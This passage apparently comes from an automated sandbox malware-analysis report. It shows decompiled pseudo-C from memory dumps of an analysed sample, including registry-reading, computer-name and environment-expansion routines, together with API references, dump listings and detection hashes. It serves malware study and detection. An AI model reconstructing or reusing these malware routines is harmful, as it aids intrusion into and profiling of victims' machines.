				asm("stosd");
				_t42 =  *0x7f7d278; // 0x8a29d88
				_t5 = _t42 + 0x48; // 0x8a29f5c
				_t82 =  *_t5;
				_t6 = _t42 + 0x4c; // 0x8a29f68
				_v16 =  *_t6;
				_t44 =  *0x7f7d2a8; // 0xaaa5a8
				_t8 = _t44 + 0x7f7ee20; // 0x410025
				_t80 = E07F77F47(_t8);
				_v20 = _t80;
				if(_t80 == 0) {
					_t76 = 8;
					L24:
					return _t76;
				}
				if(StrCmpNIW(_t80, _a4, lstrlenW(_t80)) != 0) {
					_t76 = 1;
					L22:
					E07F78B22(_v20);
					goto L24;
				}
				_t52 = E07F7155A(0,  &_a4); // executed
				if(_t52 != 0) {
					_a4 = 0;
				}
				_t53 = E07F77B3B(_t52,  *0x7f7d33c);
				_v12 = _t53;
				if(_t53 == 0) {
					_t76 = 8;
					goto L19;
				} else {
					_t55 = E07F77B3B(_t53, _t82);
					_t84 = _t55;
					if(_t55 == 0) {
						_t76 = 8;
					} else {
						_t74 = E07F77DDD(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88); // executed
						_t76 = _t74;
						_t55 = E07F78B22(_t84);
					}
					if(_t76 != 0) {
						L17:
						E07F78B22(_v12);
						L19:
						_t83 = _a4;
						if(_a4 != 0) {
							E07F74FF0(_t83);
						}
						goto L22;
					} else {
						if(( *0x7f7d260 & 0x00000001) == 0) {
							L14:
							E07F7A50A(_v88, _v92, _v92,  *0x7f7d270, 0);
							_t76 = E07F75DE9(_v92,  &_v84,  &_v80, 0);
							if(_t76 == 0) {
								_v28 = _a4;
								_v24 =  &_v92;
								_t76 = E07F76150( &_v44, 0);
							}
							E07F78B22(_v92);
							goto L17;
						}
						_t67 = E07F77B3B(_t55, _v16);
						_t86 = _t67;
						if(_t67 == 0) {
							_t76 = 8;
						} else {
							_t76 = E07F77DDD(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
							E07F78B22(_t86);
						}
						if(_t76 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x07f746c4
0x07f746c7
0x07f746ce
0x07f746d4
0x07f746d5
0x07f746d6
0x07f746d7
0x07f746d8
0x07f746d9
0x07f746de
0x07f746de
0x07f746e1
0x07f746e4
0x07f746e7
0x07f746ef
0x07f746fb
0x07f746fd
0x07f74702
0x07f74837
0x07f7483a
0x07f7483e
0x07f7483e
0x07f7471c
0x07f7482a
0x07f7482b
0x07f7482e
0x00000000
0x07f7482e
0x07f74727
0x07f7472e
0x07f74730
0x07f74730
0x07f74739
0x07f7473e
0x07f74743
0x07f74819
0x00000000
0x07f74749
0x07f7474a
0x07f7474f
0x07f74758
0x07f7477b
0x07f7475a
0x07f7476a
0x07f74770
0x07f74772
0x07f74772
0x07f7477e
0x07f7480d
0x07f74810
0x07f7481a
0x07f7481a
0x07f7481f
0x07f74821
0x07f74821
0x00000000
0x07f74784
0x07f7478b
0x07f747c1
0x07f747d1
0x07f747e7
0x07f747eb
0x07f747f0
0x07f747f6
0x07f74803
0x07f74803
0x07f74808
0x00000000
0x07f74808
0x07f74790
0x07f74795
0x07f74799
0x07f747bc
0x07f7479b
0x07f747b1
0x07f747b3
0x07f747b3
0x07f747bf
0x00000000
0x00000000
0x00000000
0x00000000
0x07f747bf
0x07f7477e

APIs

memset.NTDLL ref: 07F746C7

Part of subcall function 07F77F47: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,08A29F5C,00000000,07F746FB,00410025,00000005,?,00000000), ref: 07F77F58
Part of subcall function 07F77F47: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 07F77F75

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 07F74709
StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 07F74714

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 67a8de0aabe36ee3bf2ce1f552399a6101a2cf962578933d476e07bc78bf7564
Instruction ID: bf4290d016b7ddcfc9271006328725ea94a280c616fdb3c464ec57c59697c262
Opcode Fuzzy Hash: 67a8de0aabe36ee3bf2ce1f552399a6101a2cf962578933d476e07bc78bf7564
Instruction Fuzzy Hash: BF414CF2910299ABDB11AFE8CC84DFE7BBCEF09254F084127E901EA210D6719945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EB25A5A, Relevance: 3.3, APIs: 2, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbfca2351ae0c9dccea9fc0f4dc4e8a111d8e5a8ce5d0609428821524aee1cef
Instruction ID: 0c4c762e42484bc626e40090b31ef80a22a0a6658306c1632f5bd0ecbcc928e4
Opcode Fuzzy Hash: cbfca2351ae0c9dccea9fc0f4dc4e8a111d8e5a8ce5d0609428821524aee1cef
Instruction Fuzzy Hash: A6A1F3729262968FDF449FE8C4A5BFD7FB1EF46324F100439D458AB298E7314841CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 07F776E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E07F776E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E07F78A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x7f7d2a8; // 0xaaa5a8
						_t20 = _t68 + 0x7f7e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E07F7A6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x07f776ed
0x07f776f0
0x07f77700
0x07f77709
0x07f7770d
0x07f777db
0x07f777e1
0x07f777e1
0x07f77727
0x07f7772c
0x07f77730
0x07f77736
0x07f7773b
0x07f77742
0x07f77751
0x07f77751
0x07f77755
0x07f77757
0x07f77763
0x07f7776e
0x07f77779
0x07f7777d
0x07f77787
0x07f7778b
0x07f7778d
0x07f77792
0x07f77799
0x07f777a9
0x07f777a9
0x07f77792
0x07f7778b
0x07f777ab
0x07f777b0
0x07f777b5
0x07f777b5
0x07f777b8
0x07f777c1
0x07f777c6
0x07f777c6
0x07f777cb
0x07f777d0
0x07f777d0
0x07f777cb
0x07f77755
0x07f777d2
0x07f777d8
0x00000000

APIs

Part of subcall function 07F78A19: SysAllocString.OLEAUT32(80000002), ref: 07F78A76
Part of subcall function 07F78A19: SysFreeString.OLEAUT32(00000000), ref: 07F78ADC

SysFreeString.OLEAUT32(?), ref: 07F777C6
SysFreeString.OLEAUT32(07F74BD8), ref: 07F777D0

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: da09b0b37372550b3cd593d7da7ae2feaf0eb034cce827ecf609787d37b226b2
Instruction ID: 759579d42c9dc0610493722bb3d84e0eed3d83ef1d1b5794341ab640632f24a9
Opcode Fuzzy Hash: da09b0b37372550b3cd593d7da7ae2feaf0eb034cce827ecf609787d37b226b2
Instruction Fuzzy Hash: 243119B6910119EFCB11EF68CC88C9BBB79FFC97407198659F8159B220E6319D52CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 009813C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009813C4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x983104;
				if( *0x9830ec > 5) {
					_t16 = _t15 + 0x9840f9;
				} else {
					_t16 = _t15 + 0x9840b1;
				}
				E0098136F(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00981862( &_v32,  &_v16,  *0x983100 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x9830f8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00981E22(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x9830f8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00981EF4(_t44, _t32 + 4);
						}
					}
					_t25 = E00981D7E(_v28); // executed
				}
				ExitThread(_t25);
			}

0x009813ca
0x009813db
0x009813e5
0x009813dd
0x009813dd
0x009813dd
0x009813ec
0x009813f5
0x009813fa
0x00981418
0x00981474
0x0098141a
0x00981420
0x00981426
0x00981434
0x00981438
0x0098143f
0x00981448
0x0098144c
0x00981452
0x00981463
0x00981454
0x0098145a
0x0098145a
0x00981452
0x0098146b
0x0098146b
0x00981476

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00981420
ExitThread.KERNEL32 ref: 00981476

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 5de7286eeebd2a2a5721c19fdd7ec2ad75fb1b33f40890dc14a4de590487dbc1
Instruction ID: 9e246e480a6c837d532e7930d7c8f5063b35ea8c6db459d84e873e2ef547e0a2
Opcode Fuzzy Hash: 5de7286eeebd2a2a5721c19fdd7ec2ad75fb1b33f40890dc14a4de590487dbc1
Instruction Fuzzy Hash: 6C11BF72508306ABE711EFB4CC49E9B77ECAF44704F018816F556D73A1EB30EA069B52

Uniqueness

Uniqueness Score: -1.00%

Function 07F7831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E07F7831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E07F71525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E07F78B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x07f78321
0x07f7832c
0x07f7832e
0x07f78334
0x07f78336
0x07f7833b
0x07f78344
0x07f78348
0x07f78351
0x07f78355
0x07f78364
0x07f78357
0x07f78358
0x07f7835d
0x07f7835d
0x07f78355
0x07f78348
0x07f7836d

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,07F79C7E,7519F710,00000000,?,?,07F79C7E), ref: 07F78334

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

GetComputerNameExA.KERNEL32(00000003,00000000,07F79C7E,07F79C7F,?,?,07F79C7E), ref: 07F78351

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 9ab094870548b6cfe9178085900e32ad0542470d44f8a109eb0d556a266b2f9b
Instruction ID: df043c13ee97e8cb3be1fdfb4b42b7c8dd405a7067e2381f7158aa98a37d6205
Opcode Fuzzy Hash: 9ab094870548b6cfe9178085900e32ad0542470d44f8a109eb0d556a266b2f9b
Instruction Fuzzy Hash: D9F054B7B0020AFEEB11D6AE8C04EAF76FDEBC5690F190056A504D3140EA70DA01D771

Uniqueness

Uniqueness Score: -1.00%

Function 6EB219CC, Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6ECFD058,0000000C), ref: 6EB219DF
ExitThread.KERNEL32 ref: 6EB219E6

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 7412285147a60c8b05060adb9eb27970098a587edc3838898dc453909552bd38
Instruction ID: 3db09fcfcffd1ada74d8f36eabd021ede589f73312e80b1da5aa3cddfab41ea4
Opcode Fuzzy Hash: 7412285147a60c8b05060adb9eb27970098a587edc3838898dc453909552bd38
Instruction Fuzzy Hash: FDF02DB1930688AFDF09DFF0C94AAAE3F78EF41200F204919E0169B290CB315806DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07F77EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x7f7d23c) == 0) {
						E07F74DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x7f7d23c) == 1) {
						_t10 = E07F72789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x07f77f04
0x07f77f05
0x07f77f08
0x07f77f3a
0x07f77f3c
0x07f77f3c
0x07f77f0a
0x07f77f0b
0x07f77f20
0x07f77f27
0x07f77f29
0x07f77f29
0x07f77f27
0x07f77f0b
0x07f77f44

APIs

InterlockedIncrement.KERNEL32(07F7D23C), ref: 07F77F12

Part of subcall function 07F72789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,07F77F25,?), ref: 07F7279C

InterlockedDecrement.KERNEL32(07F7D23C), ref: 07F77F32

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: d9d01d7b96498fb305272fc5878590c289c217f3d94723ad0ab5c8392e51d125
Instruction ID: 1732ea1fbb06cefc96e64bf6f8cb850f53667ed955d40ba2968c894697248b3f
Opcode Fuzzy Hash: d9d01d7b96498fb305272fc5878590c289c217f3d94723ad0ab5c8392e51d125
Instruction Fuzzy Hash: DFE026F172852393CB2076728E44BEEB640AF00B80F2D5C57F491C0010C210C441C2F2

Uniqueness

Uniqueness Score: -1.00%

Function 07F77DDD, Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E07F77DDD(char _a4, void* _a8, void* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				long _t39;
				intOrPtr _t42;
				long _t43;
				intOrPtr* _t44;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						_t44 =  *0x7f7d0c4; // 0x7f7aaef
						 *_t44(_a12, _a16, 0,  &_a8, 0,  &_a4);
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E07F71525(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 =  *_t44(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E07F78B22(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						 *0x7f7d0cc(_a12);
					}
					L12:
					return _t43;
				}
				_t39 = E07F74614(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_t43 = _t39;
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x07f77de9
0x07f77e0c
0x07f77e16
0x07f77e1c
0x07f77e20
0x07f77e22
0x07f77e38
0x07f77e3d
0x07f77e85
0x07f77e3f
0x07f77e47
0x07f77e4b
0x07f77e82
0x07f77e4d
0x07f77e5f
0x07f77e63
0x07f77e79
0x07f77e65
0x07f77e68
0x07f77e6a
0x07f77e6f
0x07f77e74
0x07f77e74
0x07f77e6f
0x07f77e63
0x07f77e4b
0x07f77e8d
0x07f77e8d
0x07f77e94
0x07f77e9a
0x07f77e9a
0x07f77dfd
0x07f77e02
0x07f77e06
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,08A29EAA,08A29EAA), ref: 07F77E16

Part of subcall function 07F74614: SafeArrayDestroy.OLEAUT32(00000000), ref: 07F7469C

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDestroyFreeHeapOpenSafe
String ID:
API String ID: 4101316271-0
Opcode ID: af815409240ef0b3c0d4b77498c948d69bc18425058bd5e1de2d020cffc5e304
Instruction ID: 97f7bb0c4d8f1ed32cbf5c37ccca278df853c4bda896f0355dd29fb001c9dd2f
Opcode Fuzzy Hash: af815409240ef0b3c0d4b77498c948d69bc18425058bd5e1de2d020cffc5e304
Instruction Fuzzy Hash: AD210CB351015EFFCF11AE94DC808EE7BA9FF08290B098426FE1597120D631DD61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07F74614, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E07F74614(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t20;
				void* _t22;
				void* _t31;
				intOrPtr _t36;
				intOrPtr _t37;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t20 =  *0x7f7d2a8; // 0xaaa5a8
				_t4 = _t20 + 0x7f7e10c; // 0x8a286b4
				_t6 = _t20 + 0x7f7e2c0; // 0x650047
				_t36 = 0;
				_t22 = E07F776E7(_t4, _a4, _a8, _a12, _t6, _a16, _t4,  &_v20); // executed
				if(_t22 < 0) {
					_t31 = _t22;
				} else {
					_t31 = 0;
					if(_v20 != 0x2011) {
						_t31 = 1;
					} else {
						_t37 =  *((intOrPtr*)(_v12 + 0x10));
						if(_t37 != 0) {
							_t36 = E07F71525(_t37);
							if(_t36 == 0) {
								_t31 = 8;
							} else {
								E07F7A789(_t37,  *((intOrPtr*)(_v12 + 0xc)), _t36);
							}
						}
						 *_a20 = _t36;
						 *_a24 = _t37;
						__imp__#16(_v12);
					}
				}
				return _t31;
			}

0x07f7461f
0x07f74626
0x07f74627
0x07f74628
0x07f74629
0x07f7462f
0x07f74634
0x07f7463e
0x07f74648
0x07f74650
0x07f74657
0x07f746a7
0x07f74659
0x07f7465e
0x07f74664
0x07f746a4
0x07f74666
0x07f74669
0x07f7466e
0x07f74676
0x07f7467a
0x07f7468e
0x07f7467c
0x07f74685
0x07f74685
0x07f7467a
0x07f74695
0x07f7469a
0x07f7469c
0x07f7469c
0x07f74664
0x07f746af

APIs

Part of subcall function 07F776E7: SysFreeString.OLEAUT32(?), ref: 07F777C6

SafeArrayDestroy.OLEAUT32(00000000), ref: 07F7469C

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateArrayDestroyFreeHeapSafeString
String ID:
API String ID: 3028586731-0
Opcode ID: 04fd494fbb8244db2927ef5cdb57ad14eff646d1f529acdc46b09576d0151b5b
Instruction ID: 1b514753cdd26826f8c16bcd2f235985a7cc2289b902547252380ff708f814de
Opcode Fuzzy Hash: 04fd494fbb8244db2927ef5cdb57ad14eff646d1f529acdc46b09576d0151b5b
Instruction Fuzzy Hash: A7119DB6610649EFDB019FA8CC40CAEB7B9FF89314B058166E90097220D770D916CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EB37075, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000011,?,6EB17458,00000000,00000011,00000001,?), ref: 6EB370A7

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4af521c2a1a51c37790a71a13ba4e96adfff6151398fb7b322415bd2a843bf36
Instruction ID: a150a025fec6e4acbae0d9c2b11265c2fa7063cec8344e6ab326b359f965fb36
Opcode Fuzzy Hash: 4af521c2a1a51c37790a71a13ba4e96adfff6151398fb7b322415bd2a843bf36
Instruction Fuzzy Hash: 50E065311546F3EAEA612AFA9D16F8BBE5DDF422A0F310121EC14971D0DFD0D90185A5

Uniqueness

Uniqueness Score: -1.00%

Function 6EB25738, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EB2574B

Part of subcall function 6EB35039: RtlFreeHeap.NTDLL(00000000,00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB3504F
Part of subcall function 6EB35039: GetLastError.KERNEL32(00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB35061

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
